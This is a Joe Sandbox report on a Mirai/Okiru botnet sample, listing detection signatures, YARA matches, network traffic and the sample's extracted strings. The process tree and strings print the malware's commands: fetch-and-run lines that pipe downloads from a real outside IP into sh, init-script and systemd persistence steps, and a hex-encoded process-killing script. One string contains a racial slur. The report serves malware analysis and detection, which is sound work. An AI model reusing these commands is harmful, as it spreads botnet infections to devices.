Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:x86_32.nn.elf
Analysis ID:1568917
MD5:c32c3d338238953b22589c540fd85e64
SHA1:f8fc4a3ffd7a1fdf307a73e68edede3ee2eb49f6
SHA256:abc37ba47cc9897d2b0458c13a29350d3fb933a5dc605376e728961dc877a605
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1568917
Start date and time:2024-12-05 08:02:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_32.nn.elf
Detection:MAL
Classification:mal88.spre.troj.evad.linELF@0/10@0/0
Command:/tmp/x86_32.nn.elf
PID:6232
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_32.nn.elf (PID: 6232, Parent: 6157, MD5: c32c3d338238953b22589c540fd85e64) Arguments: /tmp/x86_32.nn.elf
    • sh (PID: 6242, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6267, Parent: 6242)
      • systemctl (PID: 6267, Parent: 6242, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6307, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6308, Parent: 6307)
      • chmod (PID: 6308, Parent: 6307, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6309, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6310, Parent: 6309)
      • ln (PID: 6310, Parent: 6309, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6313, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 6315, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 6316, Parent: 6315)
      • chmod (PID: 6316, Parent: 6315, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 6329, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6330, Parent: 6329)
      • mkdir (PID: 6330, Parent: 6329, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6331, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 6332, Parent: 6331)
      • ln (PID: 6332, Parent: 6331, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 6244, Parent: 799)
  • dumpe2fs (PID: 6244, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6275, Parent: 799)
  • dumpe2fs (PID: 6275, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6280, Parent: 6278)
  • snapd-env-generator (PID: 6280, Parent: 6278, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6292, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6292, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • dash New Fork (PID: 6311, Parent: 4331)
  • rm (PID: 6311, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA
  • dash New Fork (PID: 6314, Parent: 4331)
  • rm (PID: 6314, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA
  • gdm3 New Fork (PID: 6333, Parent: 1320)
  • Default (PID: 6333, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6334, Parent: 1320)
  • Default (PID: 6334, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • udisksd New Fork (PID: 6344, Parent: 799)
  • dumpe2fs (PID: 6344, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6419, Parent: 799)
  • dumpe2fs (PID: 6419, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6422, Parent: 799)
  • dumpe2fs (PID: 6422, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6424, Parent: 799)
  • dumpe2fs (PID: 6424, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6425, Parent: 799)
  • dumpe2fs (PID: 6425, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6426, Parent: 799)
  • dumpe2fs (PID: 6426, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6427, Parent: 799)
  • dumpe2fs (PID: 6427, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86_32.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_32.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86_32.nn.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      x86_32.nn.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      x86_32.nn.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      6232.1.0000000008048000.000000000805f000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6232.1.0000000008048000.000000000805f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6232.1.0000000008048000.000000000805f000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
          • 0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
          6232.1.0000000008048000.000000000805f000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
          • 0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          • 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          • 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          6232.1.0000000008048000.000000000805f000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          Click to see the 39 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86_32.nn.elfJoe Sandbox ML: detected
          Source: x86_32.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
          Source: x86_32.nn.elfString: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A" 5
          Source: global trafficTCP traffic: 192.168.2.23:38964 -> 154.216.19.139:199
          Source: global trafficTCP traffic: 192.168.2.23:60022 -> 94.156.227.234:38242
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
          Source: unknownTCP traffic detected without corresponding DNS query: 129.174.103.29
          Source: unknownTCP traffic detected without corresponding DNS query: 200.15.44.155
          Source: unknownTCP traffic detected without corresponding DNS query: 212.129.157.204
          Source: unknownTCP traffic detected without corresponding DNS query: 219.4.115.95
          Source: unknownTCP traffic detected without corresponding DNS query: 145.223.199.144
          Source: unknownTCP traffic detected without corresponding DNS query: 28.135.226.21
          Source: unknownTCP traffic detected without corresponding DNS query: 140.197.190.186
          Source: unknownTCP traffic detected without corresponding DNS query: 86.95.2.60
          Source: unknownTCP traffic detected without corresponding DNS query: 9.133.96.39
          Source: unknownTCP traffic detected without corresponding DNS query: 56.113.94.213
          Source: unknownTCP traffic detected without corresponding DNS query: 151.249.42.76
          Source: unknownTCP traffic detected without corresponding DNS query: 120.157.94.218
          Source: unknownTCP traffic detected without corresponding DNS query: 26.202.86.167
          Source: unknownTCP traffic detected without corresponding DNS query: 222.202.140.133
          Source: unknownTCP traffic detected without corresponding DNS query: 70.162.134.108
          Source: unknownTCP traffic detected without corresponding DNS query: 163.206.140.184
          Source: unknownTCP traffic detected without corresponding DNS query: 9.38.169.204
          Source: unknownTCP traffic detected without corresponding DNS query: 56.201.235.136
          Source: unknownTCP traffic detected without corresponding DNS query: 58.65.241.107
          Source: unknownTCP traffic detected without corresponding DNS query: 160.106.164.183
          Source: unknownTCP traffic detected without corresponding DNS query: 6.94.1.73
          Source: unknownTCP traffic detected without corresponding DNS query: 177.21.18.87
          Source: unknownTCP traffic detected without corresponding DNS query: 185.29.24.192
          Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.42.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
          Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
          Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
          Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
          Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6232.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6335.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6241.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6339.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
          Source: Initial sampleString containing 'busybox' found: usage: busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
          Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
          Source: Initial sampleString containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 1664, result: successfulJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 2096, result: successfulJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 2102, result: successfulJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 6292, result: successfulJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6241)SIGKILL sent: pid: 6298, result: successfulJump to behavior
